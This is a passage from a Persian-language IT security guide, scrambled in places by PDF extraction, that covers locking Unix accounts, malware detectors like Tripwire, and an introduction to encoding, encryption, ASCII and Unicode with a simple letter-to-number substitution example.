‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﺓ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﺬﻛﻮﺭ ﺑﺎ ﻋﻼﻣﺖ "*" ﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ‬
‫ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑـﺎ ﻫـﻴﭻ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻧﻤـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﻫﻤﻴﻨﻜـﻪ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛﻔﺎﻳـﺖ‬
‫ﻣﻲﻛﻨـﺪ؛ ﻭ ﻻﺯﻡ ﻧﻴـﺴﺖ ﻛـﺴﻲ ﺑﺘﻮﺍﻧـﺪ ﻭﺍﺭﺩ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮ ﮔﺮﺩﺩ )ﺍﮔﺮﭼﻪ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺭﻳﺸﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ su‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺴﺎﺑﻬﺎﻱ ﺩﻳﮕﺮ‬
‫ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ(‪.‬‬
‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻧﺪﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬
‫ﺑﻪ ﺭﺍﻫﺒﺮ ‪ Unix‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲ ﺗـﺮﻳﻦ ﺁﻧﻬـﺎ‬
‫‪ Tripwire‬ﺍﺳﺖ ﻛﻪ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﻢ‬
‫‪132 Host-Based Firewall‬‬
‫‪133 Packet-Filtering‬‬
‫ﺳﻴﺴﺘﻢ ﻭ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ‬
‫ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫‪١٠٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺿﻤﻴﻤﺔ ‪۱‬‬
‫ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﻓﺮﺁﻳﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ‬
‫ﻓﺮﺽ ﻛﻨﻴﺪ ﻣﻲ ﺧﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫ﺟﻤﻠﺔ ﻋﺎﺩﻱ ﺍﻧﮕﻠﻴﺴﻲ ﺍﺳﺖ‪:‬‬
‫‪Security is important.‬‬
‫ﺍﻣﺎ ﺩﺭ ﺍﺭﺳﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ‬
‫ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﻗﺎﻡ ﺩﻫﺪﻫﻲ ﺭﺍ ﺍﺭﺳﺎﻝ ﻛﻨﻴـﺪ‪،۵ ،۴ ،۳ ،۲ ،۱ ،۰ :‬‬
‫‪ .۹ ،۸ ،۷ ،۶‬ﭘﺲ ﺑﺎﻳﺪ ﻳﻚ ﺗﺎﺑﻊ ﻧﮕﺎﺷﺖ ﺗﻬﻴﻪ ﻛﻨـﻴﻢ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺁﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﻢ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ ﺭﺍ ﺑﻪ ﺍﻋﺪﺍﺩ ﺩﻫﺪﻫﻲ ﺗﺒﺪﻳﻞ ﻛﻨـﺪ‪،‬‬
‫ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺭﺳﺎﻝ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﻣﺠـﺪﺩﹰﺍ ﺑـﻪ ﺣﺎﻟـﺖ ﻗﺒﻠـﻲ ﺧـﻮﺩ‬
‫ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ‪:‬‬
‫ﺑﺠﺎﻱ ‪C‬‬
‫ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﻛﺪ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ‪،‬‬
‫ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪ ۱۹‬ﺭﺍ ﺑﺠﺎﻱ ‪ S‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛‬
‫‪ ۰۵‬ﺭﺍ ﺑﺠﺎﻱ ‪ E‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛‬
‫‪ ۰۳‬ﺭﺍ ﺑﺠﺎﻱ ‪ C‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛ ﻭ ‪...‬‬
‫‪19050321180920252709192709131615182001142028‬‬
‫ﻛﺪﮔﺬﺍﺭﻱ ﻗﺎﻟﺐ ﻣﻮﺿﻮﻉ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺮﺧﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ‪ .‬ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑﺮﮔـﺸﺖ ﭘـﺬﻳﺮ ﺍﺳـﺖ؛‬
‫‪١٣٦‬‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻗﺎﻟﺐ ﻛﺪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﻌﺪﹰﺍ ﻣﻲﺗﻮﺍﻧـﺪ ﻛﺪﮔـﺸﺎﻳﻲ‬
‫ﺷﻮﺩ ﺗﺎ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺗﺒﺪﻳﻞ ﮔﺮﺩﺩ‪.‬‬
‫ﺑﺠﺎﻱ ‪B‬‬
‫ﻋﺪﺩ ‪ ۲۴‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۲۵‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۲۶‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۲۷‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۲۸‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ‪.‬‬
‫ﺣﺎﻻ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﺷﺘﻪ ﺭﺍ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ‪:‬‬
‫ﻛﺪﮔﺬﺍﺭﻱ‬
‫ﺑﺠﺎﻱ ‪A‬‬
‫‪...‬‬
‫ﺑﺠﺎﻱ ‪X‬‬
‫ﺑﺠﺎﻱ ‪Y‬‬
‫ﺑﺠﺎﻱ ‪Z‬‬
‫ﺑﺠﺎﻱ ﻓﺎﺻﻠﻪ‬
‫ﺑﺠﺎﻱ ﻧﻘﻄﻪ ﻧﻴﺰ‬
‫ﻋﺪﺩ ‪ ۰۱‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۰۲‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫ﻋﺪﺩ ‪ ۰۳‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫‪134 Encoding‬‬
‫‪135 Encryption‬‬
‫‪136 Decoding‬‬
‫ﺍﮔﺮ ﻣﻴﺎﻥ ﺍﺭﻗﺎﻡ ﻓﺎﺻﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴﻢ ﺧﻮﺍﻧﺎﺗﺮ ﻫﻢ ﻣﻲﺷﻮﺩ‪:‬‬
‫‪19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20‬‬
‫‪01 14 20 28.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺷﺪ‪ ،‬ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺁﻧﺮﺍ ﺑﻪ ﺣﺎﻟﺖ ﺍﻭﻝ ﺑﺎﺯ‬
‫ﻣﻲﮔﺮﺩﺍﻧﺪ‪:‬‬
‫‪ S‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۱۹‬ﻣﻲﺷﻮﺩ؛‬
‫‪ E‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۰۵‬ﻣﻲﺷﻮﺩ؛‬
‫‪ C‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۰۳‬ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺍﻳﻨﻜﺎﺭ ﺁﻧﻘﺪﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺟﻤﻠـﺔ‬
‫ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﺁﻳﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ‬
‫ﻛﺎﺭﺑﺮﺩ ﺍﺻﻠﻲ ﻛﺪﮔﺬﺍﺭﻱ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺁﻥ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﺩﺭ‬
‫ﺍﻧﺘﻘﺎﻝ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪ .‬ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺑﺘﺪﺍ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻣﺘﻮﻥ ﺑﻪ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻭ‬
‫ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻛﺪ ‪ ASCII‬ﺑﻮﺩ ﻛﻪ ‪ ۱۲۸‬ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ‬
‫ﻓﺮﺩ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺗﻌـﺪﺍﺩ ﻛـﺪ ﺑـﺮﺍﻱ ﻧﻤـﺎﻳﺶ ‪ ۲۶‬ﺣـﺮﻑ ﺍﻟﻔﺒـﺎﻱ‬
‫ﺍﻧﮕﻠﻴــﺴﻲ ﺑــﻪ ﺷــﻜﻞ ﻛﻮﭼــﻚ ﻭ ﺑــﺰﺭﮒ‪ ۱۰،‬ﺭﻗــﻢ‪ ،‬ﺑﺮﺧــﻲ ﺍﺯ‬
‫ﻧﺸﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ﻭﻳﺮﮔﻮﻝ‪ ،‬ﻧﻘﻄﻪ‪ ،‬ﻛﺮﻭﺷﻪ ﻭ ﻧﻴﺰ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﺜﻞ ‪ Tab‬ﻭ ‪ End‬ﺑﻜﺎﺭ ﻣﻲﺭﻓﺘﻨﺪ‪.‬‬
‫ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﺑﺎﻧﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻓﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ‬
‫ﺍﺳﺖ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﺮﺩﺍﺯﺵ ﻛﻠﻤﻪ‪ ،‬ﻋﻜﺴﻬﺎ‬
‫ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬـﺎ ﺍﺯ ﺑﺎﻳﺘﻬـﺎﻱ ‪ ۸‬ﺑﻴﺘـﻲ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩﺍﻧـﺪ ﻭ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻛﺪﮔﺬﺍﺭﻱ‪ ١٣٤‬ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١٣٥‬ﻓﻨـﻮﻧﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺭﺷـﺘﻪﻫـﺎﻱ‬
‫ﺣﺮﻭﻑ ﺭﺍ ﺑﻪ ﻗﺎﻟﺐ ﻭ ﺷﻜﻞ ﺩﻳﮕﺮﻱ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻛﺪﮔـﺬﺍﺭﻱ‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺷـﻜﻠﻲ ﺍﺳـﺖ ﻛـﻪ ﻇـﺎﻫﺮ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫ﻣﻲﺩﻫﺪ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ؛‬
‫ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻧﻮﻋﻲ ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﻣﺨﻔـﻲ‬
‫ﻛﺮﺩﻥ ﻣﺤﺘﻮﻳﺎﺕ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﺑﺠﺎﻱ ‪D‬‬
‫ﻋﺪﺩ ‪ ۰۴‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬
‫‪١٠٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﺠﻤﻮﻋﹰﺎ ‪ ۲۵۶‬ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺭﺍ ﻣﻲﺳـﺎﺯﻧﺪ‪ ،‬ﻭ ﻫﻴﭽﻴـﻚ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ‪.‬‬
‫‪ Unicode‬ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺣﺮﻭﻑ‪ ،‬ﺷﻤﺎﺭﺓ ﻣﺠﺰﺍﻳﻲ ﺍﺧﺘﺼﺎﺹ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﭼﻪ ﺑـﺴﺘﺮ‪ ،‬ﺑﺮﻧﺎﻣـﻪ ﻳـﺎ ﺯﺑـﺎﻧﻲ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ Unicode‬ﺑﺎ ﺭﻫﺒﺮﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﭼﻮﻥ‬
‫‪،Microsoft ،JustSystem ،IBM ،HP ،Apple‬‬
‫‪ Unisys ،Sybase ،Sun ،SAP ،Oracle‬ﻭ‪ ...‬ﻧﻬـــــﺎﻳﻲ‬
‫ﺷﺪﻩ‪ ،‬ﻭ ﺩﺭ ﺗﻤﺎﻡ ﺑﺴﺘﺮﻫﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻔﻬﻮﻡ ﺿﻤﺎﺋﻢ‪ ١٣٧‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﻓﺎﻳﻠﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻝ ﻣـﻲ ﺷـﻮﺩ ﺍﺑﺘـﺪﺍ‬
‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﺁﻥ ﺑﻪ ﺷﻜﻞ ﺣـﺮﻭﻑ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫‪ ASCII‬ﺩﺭ ﺁﻳﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺸﺎﺑﻪ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨـﺪﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻛﻪ ﻃﻲ ﺁﻥ ﺗﻮﺍﻧـﺴﺘﻴﻢ ﺁﻥ ﺟﻤﻠـﻪ ﺭﺍ ﺗﻨﻬـﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻋـﺪﺍﺩ‬
‫ﻛﺪﮔ ـﺬﺍﺭﻱ ﻛﻨــﻴﻢ‪ .‬ﻣــﺸﺎﺑﻪ ﻣﺜــﺎﻝ ﻗﺒﻠــﻲ‪ ،‬ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﭘﻴــﺎﻡ‬
‫ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺍﺯ ﺍﺻﻞ ﭘﻴﺎﻡ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ‬
‫ﺍﻳﺠﺎﺩ ﺍﺷﻜﺎﻝ ﺧﺎﺻﻲ ﺍﻧﺘﻘـﺎﻝ ﻳﺎﺑـﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺩﺭﻳﺎﻓـﺖ ﺷـﺪ‬
‫ﻛﺪﮔﺸﺎﻳﻲ ﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﺁﻳﺪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤﺎﻧﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺁﻥ‪ ،‬ﻣﺘـﻮﻥ ﻳـﺎ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﺑﻪ ﻗﺎﻟﺐ ﺩﻳﮕﺮﻱ ﺗﺒـﺪﻳﻞ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﻫـﺪﻑ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺖ‪.‬‬
‫‪Unicode‬‬
‫ﺳﻪ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪ Unicode‬ﻧﻮﻋﻲ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺣﺮﻭﻓﻲ ﺍﺳـﺖ‬
‫ﻛﻪ ﺩﺭ ﺯﺑﺎﻧﻬﺎﻱ ﺭﺍﻳﺞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻳﻜﺴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﻛـﻪ ﺩﺭ‬
‫ﻛﻨـــﺴﺮﺳﻴﻮﻡ ‪ (http://www.unicode.org) Unicode‬ﻣـــﻮﺭﺩ‬
‫ﺗﻮﺍﻓﻖ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺷﻜﻞ ﺧﻼﺻﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ﻭ ﺍﺭﻗﺎﻡ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ‬
‫ﻭ ﺩﻳﮕﺮ ﻋﻼﻣﺘﻬﺎ ﺭﺍ ﺑﺎ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﻳﻚ ﻋـﺪﺩ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﭘـﻴﺶ ﺍﺯ ﭘﻴـﺪﺍﻳﺶ ‪ Unicode‬ﺻـﺪﻫﺎ‬
‫ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻳﻦ ﺗﺒﺪﻳﻼﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ ،‬ﺍﻣﺎ‬
‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺣﺮﻭﻑ ﻭ ﻋﻼﺕ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻼ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻴﺎﺯ ﺑـﻪ ﭼﻨـﺪﻳﻦ‬
‫ﻧﻤﻲﻛﺮﺩﻧﺪ؛ ﻭ ﻣﺜ ﹰ‬
‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺩﺍﺷﺖ ﺗﺎ ﺗﻤﺎﻣﻲ ﺯﺑﺎﻧﻬﺎﻱ ﺍﺭﻭﭘﺎﻳﻲ ﺭﺍ ﭘﻮﺷـﺶ‬
‫ﺩﻫﺪ‪ .‬ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺯﺑﺎﻥ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﺎﻧﻨـﺪ ﺍﻧﮕﻠﻴـﺴﻲ‬
‫ﻧﻴــﺰ ﻳــﻚ ﻛﺪﮔــﺬﺍﺭﻱ ﻭﺍﺣــﺪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻣﻲ ﺣــﺮﻭﻑ‪ ،‬ﻋﻼﺋــﻢ ﻭ‬
‫ﻋﻼﻣﺘﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻓﻨﻲ ﻛﺎﻓﻲ ﻧﺒﻮﺩ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ ﻧﺎﺳـﺎﺯﮔﺎﺭ‬
‫ﺑﻮﺩﻧﺪ‪ ،‬ﻳﻌﻨﻲ ﻣﻤﻜﻦ ﺑﻮﺩ ﺩﻭ ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺍﻋـﺪﺍﺩ‬
‫ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺩﻭ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻭ ﻳﺎ ﺑـﺮﺍﻱ ﻳـﻚ‬
‫ﺣﺮﻑ‪ ،‬ﺩﻭ ﻋﺪﺩ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﺎﺷـﻨﺪ‪ .‬ﻫـﺮ ﺭﺍﻳﺎﻧـﻪ )ﺑـﻮﻳﮋﻩ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ( ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔــﺬﺍﺭﻱ ﻣﺨﺘﻠﻔــﻲ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ‪ .‬ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺩﺍﺩﻩ ﻣﻴﺎﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﺪﮔـﺬﺍﺭﻱ‬
